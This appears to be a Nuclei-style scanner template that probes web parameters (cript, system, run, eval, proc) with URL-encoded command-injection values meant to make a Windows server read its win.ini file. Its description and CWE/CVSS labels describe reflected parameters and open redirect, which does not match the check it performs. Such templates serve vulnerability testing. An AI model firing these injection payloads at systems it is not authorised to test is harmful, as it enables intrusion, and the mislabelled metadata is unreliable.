http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?cript=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&system=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&run=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&eval=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&proc=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini'
id: 7rcepost-28
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 7rcepost
  severity: medium
  tags: fuzzer, generic
